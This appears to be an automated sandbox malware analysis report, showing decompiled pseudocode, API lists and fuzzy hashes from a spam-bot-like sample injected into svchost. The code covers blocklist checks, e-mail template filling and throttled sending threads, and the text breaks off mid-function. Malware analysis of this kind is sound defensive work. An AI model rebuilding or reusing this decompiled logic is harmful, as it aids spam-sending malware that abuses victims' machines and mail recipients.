                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32(?,?,02519DD7,?,00000022,?,?,00000000,00000001), ref: 02519340
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,02519DD7,?,00000022,?,?,00000000,00000001), ref: 0251936E
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,02519DD7,?,00000022,?,?,00000000,00000001), ref: 02519375
                                                                                                                                  • wsprintfA.USER32 ref: 025193CE
                                                                                                                                  • wsprintfA.USER32 ref: 0251940C
                                                                                                                                  • wsprintfA.USER32 ref: 0251948D
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 025194F1
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02519526
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 02519571
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                                                                  • String ID: runas
                                                                                                                                  • API String ID: 3696105349-4000483414
                                                                                                                                  • Opcode ID: eb82539e7a4e646050efe37842bf673145671e5b4c955fdb7623a1c263be125e
                                                                                                                                  • Instruction ID: f3e3ba32bee3e78ba13b18646cb6d62af3cb6c4669bf19dbf4ecc9f9ff858fc8
                                                                                                                                  • Opcode Fuzzy Hash: eb82539e7a4e646050efe37842bf673145671e5b4c955fdb7623a1c263be125e
                                                                                                                                  • Instruction Fuzzy Hash: D5A18CB2940259ABFB219FA0CC95FEE3BADFB45740F100426FA05D6181E7719948CFA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02512011 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 160COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E02512011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x25222f4 & 0x00000001) == 0) {
					 *0x25222f4 =  *0x25222f4 | 0x00000001;
					 *0x25222f0 = E0251F04E(0);
				}
				if(( *0x25222f4 & 0x00000002) == 0) {
					 *0x25222f4 =  *0x25222f4 | 0x00000002;
					 *0x25222ec = E0251F04E(0);
				}
				if(( *0x25222f4 & 0x00000004) == 0) {
					 *0x25222f4 =  *0x25222f4 | 0x00000004;
					 *0x25222e8 = E0251F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x25222e0 > 0xdbba0) {
					_t58 =  *0x2522000; // 0x2520288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x2522000;
						do {
							if(E02512684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E02511978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x2522000 + _t103 * 4;
						} while ( *((char*)( *(0x2522000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x25222e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x25222dc > 0xdbba0) {
					_t53 =  *0x2522000; // 0x2520288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x2522000;
						do {
							if(E02512EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E02511978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x2522000 + _t102 * 4;
						} while ( *((char*)( *(0x2522000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x25222dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x2522110;
				_t45 = E0251F04E(0) -  *0x25222f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x25222e4; // 0x12c
				if(_t122 > 0) {
					E0251E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x2520264);
					_t51 = E0251E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x25222e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E02511C5F(_t124);
							 *0x25222e4 = 0x4b0;
						}
					}
				}
				_t47 = E0251F04E(0) -  *0x25222f0;
				if(_t47 > 0x4b0) {
					E0251EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0251F04E(0);
					 *0x25222f0 = _t47;
				}
				return _t47;
			}














                                                                                                                                  0x0251201e
                                                                                                                                  0x02512020
                                                                                                                                  0x0251202f
                                                                                                                                  0x0251202f
                                                                                                                                  0x0251203b
                                                                                                                                  0x0251203d
                                                                                                                                  0x0251204c
                                                                                                                                  0x0251204c
                                                                                                                                  0x02512058
                                                                                                                                  0x0251205a
                                                                                                                                  0x02512069
                                                                                                                                  0x02512069
                                                                                                                                  0x02512078
                                                                                                                                  0x02512080
                                                                                                                                  0x0251208e
                                                                                                                                  0x02512090
                                                                                                                                  0x02512095
                                                                                                                                  0x0251209a
                                                                                                                                  0x0251209c
                                                                                                                                  0x025120a1
                                                                                                                                  0x025120ab
                                                                                                                                  0x00000000
                                                                                                                                  0x025120ad
                                                                                                                                  0x025120ad
                                                                                                                                  0x025120bd
                                                                                                                                  0x025120d0
                                                                                                                                  0x025120d0
                                                                                                                                  0x025120d0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025120bd
                                                                                                                                  0x00000000
                                                                                                                                  0x025120bf
                                                                                                                                  0x025120bf
                                                                                                                                  0x025120c0
                                                                                                                                  0x025120c9
                                                                                                                                  0x025120ce
                                                                                                                                  0x025120d4
                                                                                                                                  0x025120d6
                                                                                                                                  0x025120d6
                                                                                                                                  0x025120e5
                                                                                                                                  0x025120e7
                                                                                                                                  0x025120ec
                                                                                                                                  0x025120f1
                                                                                                                                  0x025120f3
                                                                                                                                  0x025120f8
                                                                                                                                  0x02512102
                                                                                                                                  0x00000000
                                                                                                                                  0x02512104
                                                                                                                                  0x02512104
                                                                                                                                  0x02512114
                                                                                                                                  0x02512127
                                                                                                                                  0x02512127
                                                                                                                                  0x02512127
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02512114
                                                                                                                                  0x00000000
                                                                                                                                  0x02512116
                                                                                                                                  0x02512116
                                                                                                                                  0x02512117
                                                                                                                                  0x02512120
                                                                                                                                  0x02512125
                                                                                                                                  0x0251212b
                                                                                                                                  0x0251212d
                                                                                                                                  0x0251212d
                                                                                                                                  0x0251213f
                                                                                                                                  0x02512151
                                                                                                                                  0x02512159
                                                                                                                                  0x02512160
                                                                                                                                  0x0251216a
                                                                                                                                  0x02512170
                                                                                                                                  0x02512189
                                                                                                                                  0x02512197
                                                                                                                                  0x0251219c
                                                                                                                                  0x025121a1
                                                                                                                                  0x025121c1
                                                                                                                                  0x025121c1
                                                                                                                                  0x025121a3
                                                                                                                                  0x025121a3
                                                                                                                                  0x025121a7
                                                                                                                                  0x00000000
                                                                                                                                  0x025121a9
                                                                                                                                  0x025121ad
                                                                                                                                  0x025121ae
                                                                                                                                  0x025121b6
                                                                                                                                  0x025121b9
                                                                                                                                  0x025121b9
                                                                                                                                  0x025121a7
                                                                                                                                  0x025121a1
                                                                                                                                  0x025121d1
                                                                                                                                  0x025121da
                                                                                                                                  0x025121e7
                                                                                                                                  0x025121ed
                                                                                                                                  0x025121f5
                                                                                                                                  0x025121f5
                                                                                                                                  0x02512204

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02512078
                                                                                                                                  • GetTickCount.KERNEL32 ref: 025120D4
                                                                                                                                  • GetTickCount.KERNEL32 ref: 025120DB
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251212B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02512132
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02512142
                                                                                                                                    • Part of subcall function 0251F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0251E342,00000000,745CF210,80000001,00000000,0251E513,?,00000000,00000000,?,000000E4), ref: 0251F089
                                                                                                                                    • Part of subcall function 0251F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0251E342,00000000,745CF210,80000001,00000000,0251E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0251F093
                                                                                                                                    • Part of subcall function 0251E854: lstrcpyA.KERNEL32(00000001,?,?,0251D8DF,00000001,localcfg,except_info,00100000,02520264), ref: 0251E88B
                                                                                                                                    • Part of subcall function 0251E854: lstrlenA.KERNEL32(00000001,?,0251D8DF,00000001,localcfg,except_info,00100000,02520264), ref: 0251E899
                                                                                                                                    • Part of subcall function 02511C5F: wsprintfA.USER32 ref: 02511CE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                                                                  • String ID: 0 v$localcfg$net_type$rbl_bl$rbl_ip
                                                                                                                                  • API String ID: 3976553417-1551482228
                                                                                                                                  • Opcode ID: 8dfa0b3766a76e19d727456ed545f711086daffa93adf6d2d87fe16db366042e
                                                                                                                                  • Instruction ID: 504858d4cffb628e700fecb0480745053eaaf128f5e5ad9b9a679380fcc9fa06
                                                                                                                                  • Opcode Fuzzy Hash: 8dfa0b3766a76e19d727456ed545f711086daffa93adf6d2d87fe16db366042e
                                                                                                                                  • Instruction Fuzzy Hash: 03512E3898831A5EF738EF20ED45B663BD5BB42314F02091ADE06C60D0EBB5E55CEA1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251B3C5 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E0251B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E02515CE1(_a4, 0x3e800, _a16, 0, 0);
				E0251EF00( &_v132, "%FROM_EMAIL");
				E02515CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0251ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0251EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0251EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0251EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0251EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0251EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0251F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0251F133();
				E0251EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0251AD89( &_v132, _t83);
				E0251B211(0,  &_v132, 0);
				E0251EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0251B211(0,  &_v132, 5);
				E0251EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0251B211(0,  &_v132, 0xfffffffb);
				E0251EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0251AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}











                                                                                                                                  0x0251b3e1
                                                                                                                                  0x0251b3ef
                                                                                                                                  0x0251b3ff
                                                                                                                                  0x0251b40f
                                                                                                                                  0x0251b411
                                                                                                                                  0x0251b414
                                                                                                                                  0x0251b416
                                                                                                                                  0x0251b41a
                                                                                                                                  0x0251b426
                                                                                                                                  0x0251b439
                                                                                                                                  0x0251b43b
                                                                                                                                  0x0251b440
                                                                                                                                  0x0251b440
                                                                                                                                  0x0251b443
                                                                                                                                  0x0251b453
                                                                                                                                  0x0251b467
                                                                                                                                  0x0251b47b
                                                                                                                                  0x0251b485
                                                                                                                                  0x0251b48e
                                                                                                                                  0x0251b49a
                                                                                                                                  0x0251b49f
                                                                                                                                  0x0251b4a3
                                                                                                                                  0x0251b4a4
                                                                                                                                  0x0251b4a5
                                                                                                                                  0x0251b4b6
                                                                                                                                  0x0251b4bb
                                                                                                                                  0x0251b4bc
                                                                                                                                  0x0251b4c7
                                                                                                                                  0x0251b4d8
                                                                                                                                  0x0251b4e7
                                                                                                                                  0x0251b4f8
                                                                                                                                  0x0251b504
                                                                                                                                  0x0251b515
                                                                                                                                  0x0251b51e
                                                                                                                                  0x0251b52b
                                                                                                                                  0x0251b534

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0251B467
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0251EF92
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(?), ref: 0251EF99
                                                                                                                                    • Part of subcall function 0251EF7C: lstrlenA.KERNEL32(00000000), ref: 0251EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$wsprintf
                                                                                                                                  • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                                                                  • API String ID: 1220175532-2340906255
                                                                                                                                  • Opcode ID: 2a34f6dc930918201237d4f617e830968ce31c62100a64864c90128d2348e4a7
                                                                                                                                  • Instruction ID: 59ae02e126ae225def1ba93ea009cad1dbcc7cdb71b7fd04625c68141f9f2a42
                                                                                                                                  • Opcode Fuzzy Hash: 2a34f6dc930918201237d4f617e830968ce31c62100a64864c90128d2348e4a7
                                                                                                                                  • Instruction Fuzzy Hash: 584171B284112A7EFF01BA94CCC1DFFBB6DFF99248F140015FD05B2080DA31A9188BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251C2DC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 182threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E0251C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0251A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x251c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0251B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740252
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x52366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8902
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f025220
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0251A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0251A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

























                                                                                                                                  0x0251c2dc
                                                                                                                                  0x0251c2de
                                                                                                                                  0x0251c2e4
                                                                                                                                  0x0251c2e9
                                                                                                                                  0x0251c2ef
                                                                                                                                  0x0251c482
                                                                                                                                  0x0251c485
                                                                                                                                  0x0251c488
                                                                                                                                  0x0251c48b
                                                                                                                                  0x0251c48e
                                                                                                                                  0x0251c491
                                                                                                                                  0x0251c494
                                                                                                                                  0x0251c497
                                                                                                                                  0x0251c499
                                                                                                                                  0x0251c499
                                                                                                                                  0x0251c4a0
                                                                                                                                  0x0251c4a3
                                                                                                                                  0x0251c4a6
                                                                                                                                  0x0251c4a9
                                                                                                                                  0x0251c4d5
                                                                                                                                  0x0251c4d5
                                                                                                                                  0x0251c4d5
                                                                                                                                  0x0251c4c1
                                                                                                                                  0x0251c4c9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c4cc
                                                                                                                                  0x0251c2fe
                                                                                                                                  0x0251c326
                                                                                                                                  0x0251c329
                                                                                                                                  0x0251c337
                                                                                                                                  0x0251c337
                                                                                                                                  0x0251c337
                                                                                                                                  0x0251c342
                                                                                                                                  0x0251c345
                                                                                                                                  0x0251c348
                                                                                                                                  0x0251c348
                                                                                                                                  0x0251c34e
                                                                                                                                  0x0251c351
                                                                                                                                  0x0251c354
                                                                                                                                  0x0251c357
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c357
                                                                                                                                  0x0251c32b
                                                                                                                                  0x0251c32d
                                                                                                                                  0x0251c330
                                                                                                                                  0x0251c335
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c300
                                                                                                                                  0x0251c300
                                                                                                                                  0x0251c300
                                                                                                                                  0x0251c30b
                                                                                                                                  0x0251c316
                                                                                                                                  0x0251c319
                                                                                                                                  0x0251c31c
                                                                                                                                  0x0251c321
                                                                                                                                  0x0251c35a
                                                                                                                                  0x0251c35d
                                                                                                                                  0x0251c47a
                                                                                                                                  0x0251c47d
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c47d
                                                                                                                                  0x0251c363
                                                                                                                                  0x0251c365
                                                                                                                                  0x0251c36d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c376
                                                                                                                                  0x0251c37f
                                                                                                                                  0x0251c378
                                                                                                                                  0x0251c378
                                                                                                                                  0x0251c37a
                                                                                                                                  0x0251c37a
                                                                                                                                  0x0251c37a
                                                                                                                                  0x0251c384
                                                                                                                                  0x0251c389
                                                                                                                                  0x0251c38d
                                                                                                                                  0x0251c38d
                                                                                                                                  0x0251c395
                                                                                                                                  0x0251c397
                                                                                                                                  0x0251c397
                                                                                                                                  0x0251c399
                                                                                                                                  0x0251c39c
                                                                                                                                  0x0251c39c
                                                                                                                                  0x0251c39f
                                                                                                                                  0x0251c3ac
                                                                                                                                  0x0251c3ad
                                                                                                                                  0x0251c3b5
                                                                                                                                  0x0251c3b8
                                                                                                                                  0x0251c3bc
                                                                                                                                  0x0251c3bd
                                                                                                                                  0x0251c3c1
                                                                                                                                  0x0251c3c7
                                                                                                                                  0x0251c3c9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c3cb
                                                                                                                                  0x0251c3d0
                                                                                                                                  0x0251c3d0
                                                                                                                                  0x0251c3cd
                                                                                                                                  0x0251c3cd
                                                                                                                                  0x0251c3cd
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c3c3
                                                                                                                                  0x0251c3c3
                                                                                                                                  0x0251c3d1
                                                                                                                                  0x0251c3d1
                                                                                                                                  0x0251c3d4
                                                                                                                                  0x0251c3d8
                                                                                                                                  0x0251c3da
                                                                                                                                  0x0251c3da
                                                                                                                                  0x0251c3e3
                                                                                                                                  0x0251c3eb
                                                                                                                                  0x0251c3f0
                                                                                                                                  0x0251c3f2
                                                                                                                                  0x0251c3f2
                                                                                                                                  0x0251c3fd
                                                                                                                                  0x0251c405
                                                                                                                                  0x0251c408
                                                                                                                                  0x0251c419
                                                                                                                                  0x0251c41a
                                                                                                                                  0x0251c41d
                                                                                                                                  0x0251c421
                                                                                                                                  0x0251c42a
                                                                                                                                  0x0251c42b
                                                                                                                                  0x0251c430
                                                                                                                                  0x0251c436
                                                                                                                                  0x0251c43b
                                                                                                                                  0x0251c443
                                                                                                                                  0x0251c448
                                                                                                                                  0x0251c44b
                                                                                                                                  0x0251c453
                                                                                                                                  0x0251c456
                                                                                                                                  0x0251c456
                                                                                                                                  0x0251c45c
                                                                                                                                  0x0251c46c
                                                                                                                                  0x0251c475
                                                                                                                                  0x0251c45e
                                                                                                                                  0x0251c45e
                                                                                                                                  0x0251c467
                                                                                                                                  0x0251c467
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c45c
                                                                                                                                  0x0251c3c1

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0251A4C7: GetTickCount.KERNEL32 ref: 0251A4D1
                                                                                                                                    • Part of subcall function 0251A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0251A4FA
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251C31F
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251C32B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251C363
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251C378
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251C44D
                                                                                                                                  • InterlockedIncrement.KERNEL32(0251C4E4), ref: 0251C4AE
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0251B535,00000000,?,0251C4E0), ref: 0251C4C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0251C4E0,02523588,02518810), ref: 0251C4CC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 1553760989-2166502722
                                                                                                                                  • Opcode ID: 2fa339fd2ed3ba7c1af9fbaf5669194e1d57da1d86e6de27dacfdc49dd02b683
                                                                                                                                  • Instruction ID: 469008a47a009a1900a706975913077a8cb4ceadb5b96aca64da55946e89cca9
                                                                                                                                  • Opcode Fuzzy Hash: 2fa339fd2ed3ba7c1af9fbaf5669194e1d57da1d86e6de27dacfdc49dd02b683
                                                                                                                                  • Instruction Fuzzy Hash: FB519AB1A40B418FE7248F69C5C562ABBE9FB48305B505D3ED18BC7A90D771F844CB19
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251BE31 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 152stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0251BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
